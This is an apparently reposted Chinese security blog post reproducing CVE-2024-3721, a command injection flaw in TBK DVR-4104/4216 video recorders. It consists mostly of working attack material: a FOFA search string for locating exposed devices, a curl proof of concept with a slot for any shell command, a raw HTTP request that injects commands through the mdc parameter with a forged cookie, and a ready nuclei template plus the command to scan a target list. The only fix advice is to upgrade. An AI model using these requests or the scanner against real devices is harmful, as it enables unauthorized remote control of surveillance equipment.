CVE-2024-3721漏洞复现

admin 2024年5月21日21:26:07评论43 views字数 1630阅读5分26秒阅读模式

01 漏洞

TBK DVR-4104/DVR-4216 操作系统命令注入漏洞

02 漏洞影响

  • TBK DVR-4104
  • TBK DVR-4216

03 漏洞描述

TBK DVR硬盘录像机是一套进行图像计算存储处理的计算机系统,具有对图像语音邓进行长时间录像、录音、远程监控和控制功能。该系统device.rsp接口处存在RCE漏洞,会导致系统被未授权的攻击者远控。

04 FOFA搜索语句

"Location: /login.rsp"

CVE-2024-3721漏洞复现

05 漏洞复现

POC

curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

CVE-2024-3721漏洞复现

漏洞复现成功

POC数据包如下

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 0Cookie: uid=1Accept-Encoding: gzip

06 nuclei poc

poc文件内容如下

id: CVE-2024-3721

info:  name: TBK DVR硬盘录像机 device.rsp 命令执行漏洞  author: fgz  severity: critical  description: 'TBK DVR硬盘录像机是一套进行图像计算存储处理的计算机系统,具有对图像语音邓进行长时间录像、录音、远程监控和控制功能。该系统device.rsp接口处存在RCE漏洞,会导致系统被未授权的攻击者远控。'  tags: 2024,rce,TBK DVR  metadata:    max-request: 1    fofa-query: "Location: /login.rsp"    verified: true

http:  - raw:      - |        POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Cookie: uid=1

    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'asrgkjh0')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-3721.yaml -l data2.txt

CVE-2024-3721漏洞复现

07 修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-3721漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日21:26:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-3721漏洞复现http://cn-sec.com/archives/2762281.html

发表评论

匿名网友 填写信息